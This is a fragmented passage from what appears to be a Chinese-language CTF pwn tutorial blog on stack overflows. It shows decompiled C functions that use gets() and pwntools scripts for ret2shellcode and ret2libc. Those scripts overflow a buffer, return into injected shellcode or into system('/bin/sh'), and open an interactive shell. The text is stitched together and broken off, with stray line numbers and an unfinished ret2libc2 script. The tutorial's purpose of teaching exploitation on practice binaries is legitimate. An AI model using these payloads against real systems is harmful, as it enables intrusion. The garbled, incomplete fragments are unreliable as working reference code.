int __cdecl main(int argc, constchar **argv, constchar **envp) { int v4; // [sp+1Ch] [bp-64h]@1
setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("There is something amazing here, do you know anything?"); gets((char *)&v4); printf("Maybe I will tell you next time !"); return0; }
setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); puts("No system for you this time !!!"); gets(&s); strncpy(buf2, &s, 0x64u); printf("bye bye ~"); return0; }
p = process('./ret2shellcode') shellcode = asm(shellcraft.sh()) buf2_addr = 0x0804A080
p.recvuntil("No system for you this time !!!") payload = shellcode.ljust((0x6c+4),'A') + p32(buf2_addr) p.sendline(payload) sleep(1) p.interactive() # 其他解法 from pwn import * from LibcSearcher import *
p.recvuntil('No system for you this time !!!') payload = 'A'*(0x6c+4) payload += p32(system_addr) + p32(0x08048430) + p32(binsh_addr) p.sendline(payload) sleep(1) p.interactive()
ret2syscall
ret2syscall,即控制程序执行系统调用,获取 shell。 例子,
1 2 3 4 5 6 7 8 9 10 11
int __cdecl main(int argc, constchar **argv, constchar **envp) { int v4; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); puts("This time, no system() and NO SHELLCODE!!!"); puts("What do you plan to do?"); gets(&v4); return0; }
setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("Something surprise here, but I don't think it will work."); printf("What do you think ?"); gets(&s); return0; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
from pwn import *
p = process('./ret2libc2') elf = ELF('./ret2libc2')
You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.